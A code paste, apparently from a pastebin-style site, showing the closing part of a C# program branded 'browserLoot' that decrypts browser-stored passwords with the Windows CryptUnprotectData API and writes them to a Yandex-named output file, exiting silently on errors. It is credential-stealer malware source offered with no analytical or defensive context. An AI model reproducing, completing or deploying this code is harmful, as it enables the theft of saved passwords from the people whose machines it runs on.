- string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
- using (var writePasswords = new StreamWriter(Program.FnYandex))
- {
- foreach (var line in totalStrings)
- writePasswords.WriteLine(line);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- [DllImport("Crypt32.dll", SetLastError = true, CharSet = CharSet.Auto)]
- private static extern bool CryptUnprotectData(
- ref DATA_BLOB pDataIn,
- string szDataDescr,
- ref DATA_BLOB pOptionalEntropy,
- IntPtr pvReserved,
- ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
- int dwFlags,
- ref DATA_BLOB pDataOut);
- private static string Decrypt(byte[] Datas)
- {
- var inj = new DATA_BLOB();
- var Ors = new DATA_BLOB();
- var Ghandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
- inj.pbData = Ghandle.AddrOfPinnedObject();
- inj.cbData = Datas.Length;
- Ghandle.Free();
- var entropy = new DATA_BLOB();
- var crypto = new CRYPTPROTECT_PROMPTSTRUCT();
- CryptUnprotectData(ref inj, null, ref entropy, IntPtr.Zero, ref crypto, 0, ref Ors);
- var Returned = new byte[Ors.cbData + 1];
- Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData);
- var TheString = Encoding.UTF8.GetString(Returned);
- return TheString.Substring(0, TheString.Length - 1);
- }
- [Flags]
- private enum CryptProtectPromptFlags
- {
- CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
- CRYPTPROTECT_PROMPT_ON_PROTECT = 2
- }
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
- private struct CRYPTPROTECT_PROMPTSTRUCT
- {
- public readonly int cbSize;
- public readonly CryptProtectPromptFlags dwPromptFlags;
- public readonly IntPtr hwndApp;
- public readonly string szPrompt;
- }
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
- private struct DATA_BLOB
- {
- public int cbData;
- public IntPtr pbData;
- }
- }
- #endregion
- // USG HERE 3
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement